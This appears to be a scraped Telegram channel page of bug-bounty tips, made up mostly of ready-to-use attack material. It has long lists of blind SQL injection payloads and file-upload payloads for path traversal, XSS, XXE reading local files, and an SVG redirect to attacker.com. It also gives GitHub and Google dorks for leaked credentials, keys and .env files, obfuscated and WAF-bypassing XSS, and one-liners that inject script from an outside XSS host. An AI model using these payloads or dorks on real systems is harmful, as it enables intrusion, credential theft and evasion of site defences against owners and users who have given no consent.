uz
Feedback
Bug bounty Tips

Bug bounty Tips

Kanalga Telegramโ€™da oโ€˜tish

๐Ÿ›ก๏ธ Cybersecurity enthusiast | ๐Ÿ’ป Helping secure the digital world | ๐ŸŒ Web App Tester | ๐Ÿ•ต๏ธโ€โ™‚๏ธ OSINT Specialist Admin: @laazy_hack3r

Ko'proq ko'rsatish
5 846
Obunachilar
+1624 soatlar
+677 kunlar
+37530 kunlar
Postlar arxiv
๐ŸšจSubdominator - Unleash the Power of Subdomain Enumeration๐Ÿšจ ๐Ÿ“ขSubdominator is a powerful tool for passive subdomain enumera
๐ŸšจSubdominator - Unleash the Power of Subdomain Enumeration๐Ÿšจ ๐Ÿ“ขSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources. ๐Ÿ”—Link- https://github.com/RevoltSecurities/Subdominator

Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc gr
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips

Repost from Bug Bounty
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc gr
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips

this is the top xor blind payloads i collected that most guys used including my personal also that will sure help you :) 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X 0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z 'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X 'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z (SELECT(0)FROM(SELECT(SLEEP(6)))a) 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' 'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR' (SELECT * FROM (SELECT(SLEEP(5)))a) '%2b(select*from(select(sleep(5)))a)%2b' CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END ');(SELECT 4564 FROM PG_SLEEP(5))-- ["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"] DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar 1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK (select*from(select(sleep(20)))a) '%2b(select*from(select(sleep(0)))a)%2b' *'XOR(if(2=2,sleep(10),0))OR' -1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--// '+(select*from(select(if(1=1,sleep(20),false)))a)+'" 2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE) BENCHMARK(10000000,MD5(CHAR(116))) '%2bbenchmark(10000000%2csha1(1))%2b' '%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true polyglots payloads: if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/ if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/

๐Ÿ–ฅChaining Vulnerabilities through File Upload๐Ÿ–ฅ SLQiโณ
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversalโณ
../../etc/passwd/logo.png
../../../logo.png
XSSโณ
->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1โ€ฆ"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>
Open redirect โณ
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE โณ
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

๐Ÿ”ฅ๐Ÿ”ฅGithub-Dork๐Ÿš€๐Ÿš€๐Ÿ”ฅ๐Ÿ”ฅ Happy Hunting ๐Ÿ” api_key ๐Ÿ” app_AWS_SECRET_ACCESS_KEY ๐Ÿ” app_secret ๐Ÿ” authoriztion ๐Ÿ” Ldap ๐Ÿ” aws_access_key_id ๐Ÿ” secret ๐Ÿ” bash_history ๐Ÿ” bashrc%20password ๐Ÿ” beanstalkd ๐Ÿ” client secre ๐Ÿ” composer ๐Ÿ” config ๐Ÿ” credentials ๐Ÿ” DB_PASSWORD ๐Ÿ” dotfiles ๐Ÿ” .env file ๐Ÿ” .exs file ๐Ÿ” extension:json mongolab.com ๐Ÿ” extension:pem%20private ๐Ÿ” extension:ppk private ๐Ÿ” extension:sql mysql dump ๐Ÿ” extension:yaml mongolab.com ๐Ÿ” .mlab.com password ๐Ÿ” mysql ๐Ÿ” npmrc%20_auth ๐Ÿ” passwd ๐Ÿ” passkey ๐Ÿ” rds.amazonaws.com password ๐Ÿ” s3cfg ๐Ÿ” send_key ๐Ÿ” token ๐Ÿ” filename:.bash_history ๐Ÿ” filename:.bash_profile aws ๐Ÿ” filename:.bashrc mailchimp ๐Ÿ” filename:CCCam.cfg ๐Ÿ” filename:config irc_pass ๐Ÿ” filename:config.php dbpasswd ๐Ÿ” filename:config.json auths ๐Ÿ” filename:config.php pass ๐Ÿ” filename:config.php dbpasswd ๐Ÿ” filename:connections.xml ๐Ÿ” filename:.cshrc ๐Ÿ” filename:.git-credentials ๐Ÿ” filename:.ftpconfig ๐Ÿ” filename:.history ๐Ÿ” filename:gitlab-recovery-codes.txt ๐Ÿ” filename:.htpasswd ๐Ÿ” filename:id_rsa ๐Ÿ” filename:.netrc password ๐Ÿ” FTP ๐Ÿ” filename:wp-config.php ๐Ÿ” git-credentials ๐Ÿ” github_token ๐Ÿ” HEROKU_API_KEY language:json ๐Ÿ” HEROKU_API_KEY language:shell ๐Ÿ” GITHUB_API_TOKEN language:shell ๐Ÿ” oauth ๐Ÿ” OTP ๐Ÿ” databases password ๐Ÿ” [WFClient] Password= extension:ica ๐Ÿ” xoxa_Jenkins ๐Ÿ” security_credentials #bugbountytips #GitHub

https://t.me/bug_hunting_talks This is my discussion group you guys can joint

Case Insensitivity Vulnerability
/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok

Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team member
Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members. Dork: site:*.example.com inurl:login | inurl:signin Google

Dork: Apache Server Leakage inurl:server-status "apache server status" "cpu usage" Reference: https://medium.com/@ghostlulzha
Dork: Apache Server Leakage
inurl:server-status "apache server status" "cpu usage"
Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a Vulnerable Site- https://www.itronot.co.il/server-status

Google Dork - High % keywords ๐Ÿš€ inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com

Google Dork - Server Errors โšก inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com

Google Dork - Sensitive Docs ๐Ÿ“„ ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:โ€œconfidentialโ€ | intext:โ€œNot for Public Releaseโ€ | intext:โ€internal use onlyโ€ | intext:โ€œdo not distributeโ€

๐Ÿ“ขa XSS payload, Cuneiform-alphabet based ! This payload was on trend back in 2020, but it still works :) ๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=
๐Ÿ“ขa XSS payload, Cuneiform-alphabet based ! This payload was on trend back in 2020, but it still works :) ๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++], ๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€] +(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€] +๐’€Ÿ]๐’น")() (Cuneiform is a logo-syllabic script that was used to write several languages of the Ancient Near East. The script was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.) Source - Wikipedia

New Xss Fly Under Radar Cloudflare Bypass ๐Ÿงฑ Payload : "&gt; Credit -Halim
New Xss Fly Under Radar Cloudflare Bypass ๐Ÿงฑ Payload : "> Credit -Halim

New XSS Bypass Cloudflare WAF ๐Ÿงฑ Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

๐ŸซกAutomate Your XSS
#!/bin/bash read TARGET subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt cat waybackurls.txt | dalfox pipe

Blind XSS In X-Forwarded-For Header
subfinder -d http://target.com | gau | bxss -payload '"><script src=https://hacker.xss.ht></script>' -header "X-Forwarded-For"

XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

XSS Tip: If alert() is being converted to ALERT() and you can use Like onerror="๐‚ƒ='',๐ƒจ=!๐‚ƒ+๐‚ƒ,๐‚=!๐ƒจ+๐‚ƒ,๐ƒŒ=๐‚ƒ+{},๐‰=๐ƒจ[๐‚ƒ++],๐ƒต=๐ƒจ[๐‚“=๐‚ƒ],๐€œ=++๐‚“+๐‚ƒ,๐‚ =๐ƒŒ[๐‚“+๐€œ],๐ƒจ[๐‚ +=๐ƒŒ[๐‚ƒ]+(๐ƒจ.๐‚+๐ƒŒ)[๐‚ƒ]+๐‚[๐€œ]+๐‰+๐ƒต+๐ƒจ[๐‚“]+๐‚ +๐‰+๐ƒŒ[๐‚ƒ]+๐ƒต][๐‚ ](๐‚[๐‚ƒ]+๐‚[๐‚“]+๐ƒจ[๐€œ]+๐ƒต+๐‰+'(๐‚ƒ)')()"

Bug bounty Tips - Telegram kanali @bugbounty_tech statistikasi va tahlili